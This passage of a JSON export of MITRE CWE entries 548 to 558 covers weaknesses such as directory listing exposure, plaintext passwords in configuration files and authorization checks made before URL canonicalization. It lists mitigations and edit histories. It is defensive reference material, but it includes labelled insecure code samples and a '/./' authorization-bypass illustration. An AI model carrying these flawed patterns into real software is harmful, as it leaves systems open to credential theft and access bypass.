Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Security-relevant Constants","attr":{"@_Date":"2008-04-11"}}}},"548":{"attr":{"@_ID":"548","@_Name":"Exposure of Information Through Directory Listing","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A directory listing is inappropriately exposed, yielding potentially sensitive information to attackers.","Extended_Description":"A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"497","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"Exposing the contents of a directory can lead to an attacker gaining access to source code or providing useful information for the attacker to devise exploits, such as creation times of files or any information that may be encoded in file names. The directory listing may also compromise private or confidential data."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Recommendations include restricting access to important directories or files by adopting a need to know requirement for both the document and server root, and turning off features such as Automatic Directory Listings that could expose private files and provide information that could be utilized by an attacker when formulating or conducting an attack."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":16,"Entry_Name":"Directory Indexing"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Directory Listing","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Directory Listing","attr":{"@_Date":"2020-02-24"}}]}},"549":{"attr":{"@_ID":"549","@_Name":"Missing Password Field Masking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not mask passwords during entry, increasing the potential for attackers to observe and capture passwords.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Requirements"],"Description":"Recommendations include requiring all password fields in your web application be masked to prevent other users from seeing this information."}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 19: Use of Weak Password-Based Systems." Page 279"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Type"}]}},"550":{"attr":{"@_ID":"550","@_Name":"Server-generated Error Message Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Certain conditions, such as network failure, will cause a server error message to be displayed.","Extended_Description":"While error messages in and of themselves are not dangerous, per se, it is what an attacker can glean from them that might cause eventual problems.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Recommendations include designing and adding consistent error handling mechanisms which are capable of handling any user input to your web application, providing meaningful detail to end-users, and preventing error messages that might provide information useful to an attacker from being displayed."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Server Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Server Error Message","attr":{"@_Date":"2020-02-24"}}]}},"551":{"attr":{"@_ID":"551","@_Name":"Incorrect Behavior Order: Authorization Before Parsing and Canonicalization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If a web server does not fully parse requested URLs before it examines them for authorization, it may be possible for an attacker to bypass authorization protection.","Extended_Description":"For instance, the character strings /./ and / both mean current directory. If /SomeDirectory is a protected directory and an attacker requests /./SomeDirectory, the attacker may be able to gain access to the resource if /./ is not converted to / before the authorization check is performed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"URL Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated and processed for authorization. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Authentication Before Parsing and Canonicalization","attr":{"@_Date":"2008-04-11"}}}},"552":{"attr":{"@_ID":"552","@_Name":"Files or Directories Accessible to External Parties","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product makes files or directories accessible to unauthorized actors, even though they should not be.","Extended_Description":"Web servers, FTP servers, and similar servers may store a set of files underneath a \\"root\\" directory that is accessible to the server\'s users. Applications may store sensitive files underneath this root without also using access control to limit which users may request those files, if any. Alternately, an application might package multiple files or directories into an archive file (e.g., ZIP or tar), but the application might not exclude sensitive files that are underneath those directories.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO15-C","Entry_Name":"Ensure that file operations are performed in a secure directory"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"639"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Organization":"Veracode","Modification_Date":"2010-09-09","Modification_Comment":"Suggested OWASP Top Ten mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Errant Files or Directories Accessible","attr":{"@_Date":"2008-04-11"}}}},"553":{"attr":{"@_ID":"553","@_Name":"Command Shell in Externally Accessible Directory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A possible shell file exists in /cgi-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Installation","System Configuration"],"Description":"Remove any Shells accessible under the web root folder and children directories."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"650"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Possible Command Shell (csh)","attr":{"@_Date":"2008-04-11"}}}},"554":{"attr":{"@_ID":"554","@_Name":"ASP.NET Misconfiguration: Not Using Input Validation Framework","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The ASP.NET application does not use an input validation framework.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Use the ASP.NET validation framework to check all program input before it is processed by the application. Example uses of the validation framework include checking to ensure that:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Phone number fields contain only valid characters in phone numbers","Boolean values are only \\"T\\" or \\"F\\"","Free-form strings are of a reasonable length and composition"]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"ASP.NET Misconfiguration: Input Validation","attr":{"@_Date":"2008-04-11"}}}},"555":{"attr":{"@_ID":"555","@_Name":"J2EE Misconfiguration: Plaintext Password in Configuration File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The J2EE application stores a plaintext password in a configuration file.","Extended_Description":"Storing a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resource, making it an easy target for attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"260","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not hardwire passwords into your software."},{"Phase":"Architecture and Design","Description":"Use industry standard libraries to encrypt passwords before storage in configuration files."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Below is a snippet from a Java properties file in which the LDAP server password is stored in plaintext.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword","xhtml:br":""}}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Password in Configuration File","attr":{"@_Date":"2008-04-11"}}}},"556":{"attr":{"@_ID":"556","@_Name":"ASP.NET Misconfiguration: Use of Identity Impersonation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Configuring an ASP.NET application to run with impersonated credentials may give the application unnecessary privileges.","Extended_Description":"The use of impersonated credentials allows an ASP.NET application to run with either the privileges of the client on whose behalf it is executing or with arbitrary privileges granted in its configuration.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use the least privilege principle."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"ASP.NET Misconfiguration: Identity Impersonation","attr":{"@_Date":"2008-04-11"}}}},"558":{"attr":{"@_ID":"558","@_Name":"Use of getlogin() in Multithreaded Application","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses the getlogin() function in a multithreaded context, potentially causing it to return incorrect values.","Extended_Description":"The getlogin() function returns a pointer to a string that contains the name of the user associated with the calling process. The function is not reentrant, meaning that if it is called from another process, the contents are not locked out and the value of the string can be changed by another process. This makes it very risky to use because the username can be changed by other processes, so the results of the function cannot be trusted.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"663","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control","Other"],"Impact":["Modify Application Data","Bypass Protection Mechanism","Other"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Using names for security purposes is not advised. Names are easy to forge and can have overlapping user IDs, potentially causing confusion or impersonation."},{"Phase":"Implementation","Description":"Use getlogin_r() instead, which is reentrant, meaning that other processes are locked out from changing the username."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code relies on getlogin() to determine whether or not a user is trusted. It is easily subverted.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"pwd = getpwnam(getlogin());if 